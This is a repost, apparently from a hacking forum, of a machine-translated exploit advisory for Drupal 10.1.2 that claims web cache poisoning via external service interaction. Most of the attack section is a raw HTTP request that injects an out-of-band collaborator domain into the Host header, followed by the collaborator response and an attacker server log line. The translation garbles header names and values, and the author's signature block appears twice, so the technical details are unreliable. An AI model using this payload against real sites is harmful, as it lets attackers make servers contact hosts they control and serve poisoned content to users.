H

Drupal 10.1.2-网络缓存- 备案- 外部服务互动

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title: drupal-10.1.2 Web-Cache-Poisoning-External-Service-Service Interaction
##作者: nu11secur1ty
## date: 08/30/2023
## Vendor: https://www.drupal.org/
## Software: https://www.drupal.org/download
##参考: https://portswigger.net/kb/issues/00300210_external-service-interaction-http
## Description:
可以诱导应用程序执行服务器端HTTP
请求任意域。
有效载荷D7LKTI6PQ8FJKX12IKWVYE34OVUOIE680WQJG75.OASTIFY.COM是
在HTTP主机标头中提交。
该应用程序向指定域执行了HTTP请求。为了
第二个测试,攻击者存储了回应
在服务器上具有恶意内容。这对很多
如果攻击者散布恶意URL,则该系统的用户
并通过使用重定向利用来通过电子邮件等发送。
状态:高价值
[+] exploit:
````得到
get/drupal/web/?psp4hw87ev=1 http/1.1
HOST: D7LKTI6PQ8FJKX12IKWVYE34OVUOIE680WQJG75.OASTIFY.COM
Accept-incoding: Gzip,Deflate,PSP4HW87EV
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7,q=0.7,q=0.7,
文本/PSP4HW87EV
Accept-Language: EN-US,PSP4HW87EV; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
AppleWebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.111
Safari/537.36 PSP4HW87EV
连接:关闭
cache-control: max-age=0
升级- 不肯定- requests: 1
sec-ch-ua:'.not/a)品牌'; v='99','google chrome'; v='116','chromium'; v='116'
sec-ch-ua-platform:窗口
sec-ch-ua-mobile:0
Origin: https://psp4hw87ev.pwnedhost.com
````````
[+]来自burpcollaborator server的响应:
````http
http/1.1 200好
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-version: 4
content-type:文本/html
内容长度: 62
HTMLBodyZeq5ZCBZ3X69X9A63UBXIDZJLGIGMMGIFIGZ/BODY/HTML
````````
[+]攻击者服务器的响应
````http
192.168.100.45 - [30/Aug/2023 05:52:56]
/drupal/web/rss.xml?psp4hw87ev=1 http/1.1'
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../main/main/vendors/drupal/2013/drupal-10.1.2)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)
##时间花费:
03:35:00
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
- -
系统管理员- 基础设施工程师
穿透测试工程师
0day exploit数据库https://0day.today/
主页page: https://www.nu11secur1ty.com/
hipenimr0v7qco/+seh9gbclaaywgnpobiq75scj60e=
nu11secur1ty http://nu11secur1ty.com/
 
后退
顶部